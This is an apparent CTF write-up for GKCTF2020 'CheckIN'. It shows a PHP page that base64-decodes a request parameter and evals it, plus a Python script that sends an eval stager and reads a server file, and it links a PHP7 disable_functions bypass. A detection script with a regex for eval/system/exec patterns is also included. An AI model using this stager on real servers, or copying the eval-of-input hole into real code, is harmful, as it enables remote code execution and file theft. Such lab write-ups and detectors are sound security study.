[GKCTF2020]CheckIN

Posted: 2020-05-25 17:07:25

https://www.gem-love.com/ctf/2361.html#CheckIN
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
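new ClassName();

import requests
from base64 import b64encode
from urllib.parse import quote as q

# PHP sent in the "a" parameter
payload = "var_dump(include('/tmp/1.txt'));"
# Ginkgo is base64 of eval($_GET['a']); so the challenge's Eval() runs whatever "a" holds
url = "http://8727791d-0b5b-41f6-a3c4-e33252808486.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX0dFVFsnYSddKTs=&a="

#payload = b64encode(payload.encode())
payload = q(payload)  # URL-encode the payload before appending it to the query string
r = requests.get(url+payload)
print(url+payload)
print(r.text[3053:])  # skip the first 3053 characters of the response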
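
A defender-side counterpart to the request above, as an added example that is not part of the original post: it scans request targets, as they would appear in a web access log, for query parameters that carry PHP code either directly or base64-encoded the way the `Ginkgo` parameter does. The function names, the pattern list and the sample lines are constructed for this illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# PHP constructs that have no business arriving inside a request parameter.
SUSPICIOUS = re.compile(
    r"\b(eval|assert|system|exec|passthru|shell_exec|include|require)\s*\("
    r"|\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
B64_RE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def decode_b64(value):
    """Return the decoded text if value is base64 of printable text, else None."""
    value = value.replace(" ", "+")  # parse_qsl turns a literal '+' into a space
    if len(value) % 4 or not B64_RE.fullmatch(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_request(target):
    """Return [(param, text)] for query parameters carrying PHP code, raw or base64."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = decode_b64(value)
        candidate = value if decoded is None else decoded
        if SUSPICIOUS.search(candidate):
            hits.append((name, candidate))
    return hits


# Constructed sample request targets, as they would appear in an access log.
SAMPLES = [
    "/?Ginkgo=ZXZhbCgkX0dFVFsnYSddKTs=&a=var_dump%28include%28%27/tmp/1.txt%27%29%29%3B",
    "/search?q=hello+world&token=aGVsbG8gd29ybGQ=",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", scan_request(line))
```

The challenge reads `$_REQUEST`, so the same check applies to POST fields; only the query string is parsed here.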

Original: https://www.cnblogs.com/youmg/p/12957708.html
